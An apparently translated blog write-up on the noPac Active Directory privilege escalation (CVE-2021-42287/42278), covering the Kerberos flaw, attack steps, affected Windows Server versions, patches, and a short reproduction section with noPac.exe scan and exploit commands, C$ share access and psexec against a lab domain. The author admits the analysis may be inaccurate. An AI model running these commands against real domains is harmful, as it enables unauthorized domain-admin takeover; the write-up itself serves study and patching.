xfeng

I saw someone publicly disclose the EXP for CVE-2021-42287/CVE-2021-42278 privilege escalation vulnerabilities, so I looked for relevant information to study for the purpose of learning.

This privilege escalation vulnerability can elevate ordinary users within the domain to domain admin privileges. Although certain conditions are required, the harm is still significant.

Since the information about this vulnerability is not very systematic at the moment and my understanding is not very thorough, the analysis in the following text may not be very accurate.

1. Vulnerability Principle#

Before understanding the vulnerability principle, it is necessary to understand the principle of the Kerberos protocol.

A simple understanding is:

The Kerberos protocol consists of three steps

The authentication process is shown in the following diagram:

CVE-2021-42278:

The machine user's account is in the form of adding $ after the account name. Because the DC does not verify whether the machine user's account ends with $, the machine username is treated as an ordinary user to perform operations.

CVE-2021-42287:

When an ordinary user obtains TGT, they request their own ST through another user, and then send the TGT to the KDC. Because the TGT is obtained using another user's information, the KDC cannot find matching user information in the database. Then the KDC looks for the machine user's ST and finally obtains the machine user's privileges.

1.1 Vulnerability Process:#

• Use a domain ordinary user to create a new machine account (domain users are allowed to create machine accounts by default).
• Clear the machine account SPN, change the machine name to the domain controller name, and remove the trailing $.
• Use the newly created machine account to initiate a Kerberos request authentication to obtain TGT (Ticket Granting Ticket, a ticket for tickets).
• Delete the machine account and use the obtained TGT to request ST (Server Ticket) with ldap administrator service permissions.
• The domain controller decrypts the TGT to obtain PAC (Privilege Attribute Certificate) and finds that the requested permissions are for ldap administrator service. The domain controller then encrypts the ST with the ldap server administrator's HASH.
• The ldap server administrator decrypts the PAC using their own HASH.
• The request user and the requested user's information are obtained through the PAC to determine if the user has access to the service.
• This determination process requires requesting the domain controller. The domain controller first searches the database (Active Directory) for information about the requester. Because the $ has been removed, it will be treated as a domain user for the search. When no information is found, the domain controller searches for machine account information and adds $ at the end.
• At this point, the domain controller obtains the information: the domain controller machine wants to request ldap administrator service, and through the request, domain controller permissions can be obtained.

1.2 Vulnerability Conditions:#

• Low privilege domain accounts can create and modify machine accounts.
• When searching for users during AP_REP (not TGS_REP), if the user is not found, search for machine users and add $ afterwards.
• Domain controller allows delegation attacks.
• DC is not patched with KB5008380 or KB5008602.

2. Affected Versions#

CVE-2021-42278
￮ Windows Server 2012 R2
￮ Windows Server 2012 (Server Core installation)
￮ Windows Server 2012
￮ Windows Server 2008 R2 for x64-based Systems Service Pack 1(Server Core installation)
￮ Windows Server 2008 R2 for x64-based Systems Service Pack 1
￮ Windows Server 2008 for x64-based Systems Service Pack 2(Server Core installation)
￮ Windows Server 2008 for x64-based Systems Service Pack 2
￮ Windows Server 2008 for 32-bit Systems Service Pack 2(Server Core installation)
￮ Windows Server 2008 for 32-bit Systems Service Pack 2
￮ Windows Server 2016 (Server Core installation)
￮ Windows Server 2016
￮ Windows Server, version 20H2 (Server Core Installation)
￮ Windows Server, version 2004 (Server Core installation)
￮ Windows Server 2022 (Server Core installation)
￮ Windows Server 2019 (Server Core installation)
￮ Windows Server 2022￮ Windows Server 2019
￮ Windows Server 2012 R2 (Server Core installation)
CVE-2021-42287
￮ Windows Server 2012 R2 (Server Core installation)
￮ Windows Server 2012 R2
￮ Windows Server 2012 (Server Core installation)
￮ Windows Server 2008 R2 for x64-based Systems Service Pack 1(Server Core installation)
￮ Windows Server 2012
￮ Windows Server 2008 R2 for x64-based Systems Service Pack 1
￮ Windows Server 2008 for x64-based Systems Service Pack 2(Server Core installation)
￮ Windows Server 2008 for x64-based Systems Service Pack 2
￮ Windows Server 2008 for 32-bit Systems Service Pack 2(Server Core installation)
￮ Windows Server 2008 for 32-bit Systems Service Pack 2
￮ Windows Server 2016 (Server Core installation)
￮ Windows Server 2016￮ Windows Server, version 20H2 (Server Core Installation)
￮ Windows Server, version 2004 (Server Core installation)
￮ Windows Server 2022 (Server Core installation)
￮ Windows Server 2022
￮ Windows Server 2019 (Server Core installation)
￮ Windows Server 2019

3. Vulnerability Reproduction#

Tools:

• https://github.com/WazeHell/sam-the-admin.git
• https://github.com/Ridter/noPac.git

3.1 Scanning and Probing#

noPac.exe scan -domain redteam.club -user xfeng -pass 123456

3.2 Direct Exploitation (noPac.exe)#

noPac.exe -domain redteam.club -user test -pass pass@123 /dc ad02.redteam.club /mAccount test123 /mPassword feng /service cifs /ptt

dir \\ad01.redteam.club\c$

psexec.exe \\ad01.redteam.club cmd.exe

4. Vulnerability Fix#

Microsoft has released security patches, which can be viewed in detail at link

Check if your version of Windows has installed the corresponding security patch.

5. Reference Articles#

https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html

https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing